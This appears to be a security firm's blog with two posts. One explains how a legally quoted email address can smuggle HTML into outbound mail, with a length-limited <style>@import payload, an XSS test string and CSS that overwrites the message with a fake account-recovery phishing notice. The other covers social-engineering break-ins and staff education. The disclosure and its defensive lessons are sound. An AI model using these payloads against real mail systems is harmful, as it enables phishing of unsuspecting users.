Monday, Jun 13, 2016

Email Injection

On a recent project, we noticed that an application was accepting email addresses in an unsafe format. In the case of this application, it was sending the email address in an email to a user’s account, without escaping.

It’s not that the application wasn’t validating email addresses. It was, in fact, running all email addresses through the standard Java validator, javax.mail.internet.InternetAddress.validate().

However, legal email addresses can have some amazingly complex things in them.

The Wikipedia page for email addresses has examples of legitimate, if crazy, email addresses.

The Java library mostly (but not completely) agrees with the examples in that article.

There are two general methods attackers can use to put dangerous content into email addresses: comments and quoted portions. The Java library does not accept comments in email addresses, but it does accept quoted portions.

This is an example of a legal email using quoting:

 "john.smith"@example.org

as is

 "john.smith<script>alert(1);</script>"@example.org

Web pen testers will recognize the latter as the canonical test for an XSS attack.
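To see that such quoted local parts really are legal, here is a minimal sketch using Python's stdlib email.headerregistry rather than the Java validator discussed above; both follow the same RFC 5322 quoting rules, so this is illustrative only:

```python
# Sketch: a local part containing HTML specials is a legal address form.
# Python's stdlib quotes it automatically when rendering the addr-spec,
# just as the Java validator accepts the already-quoted form.
from email.headerregistry import Address

addr = Address(username="john.smith<script>alert(1);</script>",
               domain="example.org")

# The local part comes back wrapped in double quotes -- a valid address
# carrying a live XSS test string.
print(addr.addr_spec)
```

The point is that the markup passes through untouched: quoting makes the address RFC-legal without making it safe to embed anywhere.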

In this case, the email address was being put into an outbound email. This normally is not an XSS vector. Email is typically read in a dedicated mail application, or in a webapp. Mail applications often don’t have JavaScript engines, and Webmail applications as a rule will refuse to render any JavaScript. (Sometimes attackers will find a way around this, but it’s very hard to do, and if they succeed it is a much bigger problem than any I describe here.)

Modern mail readers still have significant CSS capabilities, so the ability to insert arbitrary HTML into them means the ability to change the message visible to the user arbitrarily.  This can lead to very successful phishing attacks, since an attacker can cause malicious messages to originate from the legitimate and expected service.

My primary mail reader target was OS X’s Mail.app, with Thunderbird as a secondary.

The application we were looking at had a hard limit of 50 characters for an email address, and the domain had to have at least two labels, the second of which had to be at least 2 characters. (Neither restriction is part of the RFC, nor does the Java library require it.) Given the quotes and the domain, the longest message that could be inserted was 43 characters:

    "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"@x.xx

It was necessary, of course, to open a style tag and to close it, which left us with this much room:

    "<style>XXXXXXXXXXXXXXXXXXXXXXXXXXXX</style>"@x.xx

This still allowed room for a payload to be inserted thanks to URL shorteners and use of the @import directive.

    "<style>@import 'http://xxxxxxxxxxx'</style>"@x.xx

The “http://” is required in the mail context, as are the quotes.

Can a normal person fit a URL in 11 characters?  Domains like “ant.nu” are available, but there is no need to splurge on a short domain.  The best link shorteners can produce a URL in 9 characters, so this is our hostile email address, with two characters to spare:

    "<style>@import 'http://ly.my/pva'</style>"@x.xx
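The character budget above can be checked mechanically. This sketch rebuilds each stage from the text and verifies it fits the 50-character limit:

```python
# Sketch: verifying the 50-character budget worked out above.
LIMIT = 50

# 50 chars total, minus two quotes and the minimal domain "@x.xx".
filler = "X" * 43
stage1 = f'"{filler}"@x.xx'

# Opening and closing the style tag costs 15 of the 43 characters.
stage2 = '"<style>' + "X" * (43 - len("<style></style>")) + '</style>"@x.xx'

# The final payload, with a 9-character shortened URL.
payload = '"<style>@import \'http://ly.my/pva\'</style>"@x.xx'

for addr in (stage1, stage2, payload):
    print(len(addr), addr)

assert all(len(a) <= LIMIT for a in (stage1, stage2, payload))
```

The final payload comes to 48 characters: the two to spare mentioned above.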

Now, with arbitrary space, we can put in an appropriate payload that overwrites the message:

    body {
      visibility: hidden;
    }
    body:after {
      content:'We have detected unauthorized access to your account. Please visit http://example.account-recovery.net/ to restore access, or call 555-1212.';
      visibility: visible;
      display: block;
      position: absolute;
      padding: 5px;
      top: 2px;
    }

And the message in Apple Mail.app looks like this:

In Thunderbird, if you accept the warning to load remote content, you get this:

LESSONS

  1. Email address validation is not the same as email address sanitization.
  2. More mail readers should be suspicious of external links, and offer an option like Thunderbird does to delay loading of external content.
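Lesson 1 can be made concrete with a minimal sketch, assuming the validated address ends up inside an HTML email body (the render_greeting helper is hypothetical, not part of the application discussed):

```python
import html

def render_greeting(addr: str) -> str:
    # Hypothetical helper: embed a validated address in an HTML email body.
    # Validation alone would emit addr verbatim; escaping at the point of
    # output turns markup characters into inert entities.
    return "<p>A message was sent to " + html.escape(addr) + "</p>"

hostile = '"<style>@import \'http://ly.my/pva\'</style>"@x.xx'
print(render_greeting(hostile))
```

The <style> tag is emitted as &lt;style&gt; and is never parsed as CSS, even though the address sailed through validation.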
Wednesday, Apr 08, 2009

Creating a Patch for Human Stupidity

Social engineers use old tricks and new to bypass firewalls and other conventional IT security defences by taking advantage of human weakness or kindness to attack secure buildings, machine rooms, or trading floors from inside. This gives them access to information and data that they simply couldn't get by hacking a web site. They don't have to pick locks or break windows as it’s usually easier not to. They use research, a plausible “story”, and a winning smile. A high-profile example of this type of attack was prosecuted in the UK in March 2009.

In September 2004, security procedures at the Sumitomo Mitsui Banking Corporation failed when one of its security guards let friends in to play cards. The hackers installed software that recorded pictures of information on computer screens, keystrokes, and users' security details. They were caught when they tried to collect on the information they had harvested.

In 2007, a conman gained access to the safety deposit boxes at an ABN Amro bank in Antwerp's diamond quarter, in what is thought to have been the biggest robbery ever committed by one person. The thief used no violence, just his charm, to gain entry and steal gems worth €21 million.

"He bought chocolates for the personnel, he was a nice guy, he charmed them, got the original of keys to make copies and got information on where the diamonds were," said Philip Claes, spokesman for the Diamond High Council in Antwerp.

Many people who work in offices will know that passwords, key codes, and SecureID tokens can often be simply picked up off the desks around them. If a social engineer can gain access to an office, any of this information is potentially up for grabs. The data that can be accessed using these items is very likely to be critical to the company, otherwise why defend it?

So how do you defend your company against an attacker who uses his knowledge of your staff to simply walk into the building?

The patch for human weakness is simple: education. An informed workforce is safer than one left in the dark. Managers should try to create a corporate culture in which security is everybody’s business, not just that of the IT department or the security guard. An organisation’s technological security may identify some attacks, but if the staff and organisational culture are on your side as well, then your systems will be far more secure.

For example, employees should understand that if legitimate IT staff need access to a machine, they should not need the employee's help, or username and password, to do so. But if the company's employees treat technology as a feared and mysterious thing, it leaves a hole through which a social engineer can attack. The social engineer may be given access to critical systems, simply by posing as one of the IT staff. During social engineering engagements we have had instances where employees have logged in for the social engineering team, believing them to be IT staff, and left them in charge of critical systems.

Since we started testing how companies' systems hold up against social engineering attacks, we have been surprised by how easy it is to operate in a crowded room. We have even worked in restricted access areas and never been challenged. Looking like you belong and are busy can make people leave you alone. Why does this work?

Most organisations' security policies require that staff ask people they do not recognise for company ID. But especially in Britain, asking for ID is seen as confrontational behaviour, and those who do it may meet more outrage than praise for their willingness to challenge strangers. You need more than just a policy to resolve this problem; you need to teach people that social engineering actually happens, and that they can make a difference.

In the UK we are lucky enough to have a TV show called The Real Hustle, which purports to teach people how con men work and so protect them from getting hustled. If it can keep people’s money in their wallets, couldn’t staff education in a similar vein keep corporate data safe?